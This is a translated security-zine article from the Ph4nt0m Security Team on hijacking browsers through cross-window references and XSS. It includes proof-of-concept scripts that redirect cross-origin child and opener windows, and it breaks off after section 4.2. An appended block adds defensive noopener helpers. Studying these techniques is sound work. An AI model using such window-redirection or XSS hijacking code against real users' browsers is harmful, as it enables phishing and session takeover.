Browser hijacking using the window reference vulnerability and XSS Vulnerability


= Ph4nt0m Security Team =

Issue 0x03, Phile #0x05 of 0x07


[Browser hijacking using the window reference vulnerability and XSS vulnerability]
[By rayh4c]
[<rayh4c # 80sec.com>]


[Contents]

1. Preface
2. Same-origin policy overview
3. Understanding the same-origin policy of window objects
4. Same-origin policy vulnerabilities in window references
4.1 Same-origin policy when the parent window references the child window
4.2 Same-origin policy when the child window references the parent window
5. Hijacking the browser using the window reference vulnerability
6. Hijacking the browser using an XSS vulnerability
6.1 Forward cross-window hijacking
6.2 Reverse cross-window hijacking
6.3 Extremely dangerous cross-frame window reference hijacking
6.4 Extremely dangerous forward/reverse cross-window recursive hijacking
6.5 Full browser control
7. Postscript
8. References


1. Preface

Lately there have been few technical articles on XSS vulnerabilities in China, so I decided to write this one. Many of its details and observations come from long exchanges with all of you, and it includes my own understanding of the browser same-origin policy and of XSS. XSS has developed from session hijacking, phishing, XSS worms and other mainstream attack methods to where it stands today, which tells everyone that a real XSSer never stops innovating; XSSers will demonstrate every possibility of XSS vulnerabilities.


2. Same-origin policy overview

The same-origin policy is the foundation of browser security and an important security standard for the client-side scripting that browsers support. We can understand this security standard from the word "origin": according to the W3C, an "origin" consists of the domain name, the protocol and the port. Many same-origin policy vulnerabilities have been disclosed over the years, with varying degrees of harm; for example, the MS06-014 web trojans that have been popular since 2006 completely overturned the same-origin policy. This document mainly describes the window reference vulnerability, and then extends from that vulnerability to how an XSS vulnerability can use the same-origin policy characteristics of the DOM to achieve browser hijacking.


3. Understanding the same-origin policy of window objects

A window is a browser window, and each browser window can be represented by an instance of the window object. The window object has many properties and methods, and you can write a simple script to list all of them:

-- Code -------------------------------------------------------------------------
<script language="javascript">
for (var p in window) document.write(p + "<br>");
</script>
-------------------------------------------------------------------------------

The properties and methods of these window objects can change the appearance of the window and the content of the web page inside it. When multiple window objects start to reference each other, these properties and methods must follow the same-origin policy.

For example, if the properties and methods of the window object of the b.com page could be called from the a.com page, an XSSer could access any website on the Internet through XSS. To avoid such security problems, the same-origin policy is required. We can save the script below as demo.html in a local directory, or put it on a remote server, for testing. The effect of the script is to call the properties and methods of the window object of a child window with a different origin. We will find that the value of location is blank. This is a special case, indicating that a parent window of a different origin referencing the location property of the child window's window object is not denied.

--Demo.html --------------------------------------------------------------------
<script language="javascript">
var newWin;

// Walk every property of the given window object: call the methods, and
// record the value of each property (or the error message if access is denied).
function allPrpos(obj) {
    var props = "<table><tr><td>name</td><td>value</td></tr>";
    for (var p in obj) {
        try {
            if (typeof obj[p] == "function") {
                obj[p]();
            } else {
                props += "<tr><td>" + p + "</td><td>" + obj[p] + "</td></tr>";
            }
        } catch (ex) {
            props += "<tr><td>" + p + "</td><td>" + ex.message + "</td></tr>";
        }
    }
    document.write(props + "</table>");
}

// Open a child window with a different origin and inspect it once it has loaded.
function createWin() {
    newWin = window.open("http://www.google.com");
    setTimeout(function () { allPrpos(newWin); }, 2000);
}
</script>

<button onclick="createWin()">Create a subwindow for test</button>
-------------------------------------------------------------------------------


4. Same-origin policy vulnerabilities in window references

4.1 Same-origin policy when the parent window references the child window

Last year I published an Internet Explorer 6 cross-origin scripting vulnerability in Ph4nt0m magazine, which Microsoft has since fixed with the MS08-058 patch. That vulnerability still exposes the same-origin policy problem of a parent window referencing a child window. From the test in Part 2 we know that the browser does not prevent the parent window from accessing the location property of a child window with a different origin. The following script shows that the parent window can control the location property value of a child window with a different origin.

--Vul1.html --------------------------------------------------------------------
<script language="javascript">
var newWin;

// Open a child window with a different origin, then set its location from the
// parent: the navigation is not blocked by the same-origin policy.
function createWin() {
    newWin = window.open("http://www.google.com");
    setTimeout(function () { newWin.location = "http://www.80sec.com"; }, 2000);
}
</script>

<button onclick="createWin()">Create a subwindow for test</button>
-------------------------------------------------------------------------------


4.2 Same-origin policy when the child window references the parent window

A reverse test finds the same problem when the child window references the parent window. We can verify this with the javascript: pseudo-protocol. The property through which a child window references the parent window's window object is window.opener. Browse a website, click links to open N pages, and enter the following script in the address bar of each of those pages: we will be surprised to find that parent windows of both the same origin and a different origin are redirected to the 80sec website.

-- Code -------------------------------------------------------------------------

javascript:window.opener.location = "http://www.80sec.com"; void(0);

-------------------------------------------------------------------------------
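The two references tested in 4.1 and 4.2 (parent writing newWin.location, child writing window.opener.location) are both cut by the "noopener" relationship. The following is an added example, not code from rayh4c's article: defensive helpers for a site that wants neither its pages nor windows it opens to be redirected this way. Each function takes the window-like object as a parameter (an assumption made so it can be exercised with constructed stand-ins outside a browser).

```javascript
// Added example (not part of the original article). Mitigations for the
// cross-window location writes described above: noopener on links and on
// window.open(), plus dropping window.opener on pages that were opened by
// another window. Window objects are passed in so the logic runs without a DOM.

// Outbound links that open a new window should carry rel="noopener";
// noreferrer is added as a fallback for older browsers that lack noopener.
function hardenRel(rel) {
  var tokens = new Set(String(rel || "").toLowerCase().split(/\s+/).filter(Boolean));
  tokens.add("noopener");
  tokens.add("noreferrer");
  return Array.from(tokens).join(" ");
}

// Programmatic opening: with "noopener" the browser sets the child's
// window.opener to null, and window.open() itself returns null, so the
// opener keeps no handle through which it could set newWin.location.
function openIsolated(win, url) {
  return win.open(url, "_blank", "noopener,noreferrer");
}

// Landing-page hardening: a page that was opened by another window drops
// the reference, so its own scripts (including anything injected via XSS)
// cannot redirect the window that opened it. Returns true if an opener existed.
function severOpener(win) {
  if (!win.opener) return false;
  try {
    win.opener = null;
  } catch (e) {
    // some engines expose a read-only opener; nothing more can be done here
  }
  return true;
}

// Audit helper: anchors that target a new window but lack noopener.
// Expects objects with target/rel fields, e.g. the result of
// document.querySelectorAll("a[target]") in a browser.
function findUnsafeBlankLinks(anchors) {
  return anchors.filter(function (a) {
    return String(a.target || "").toLowerCase() === "_blank" &&
      !/\bnoopener\b/i.test(a.rel || "");
  });
}
```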
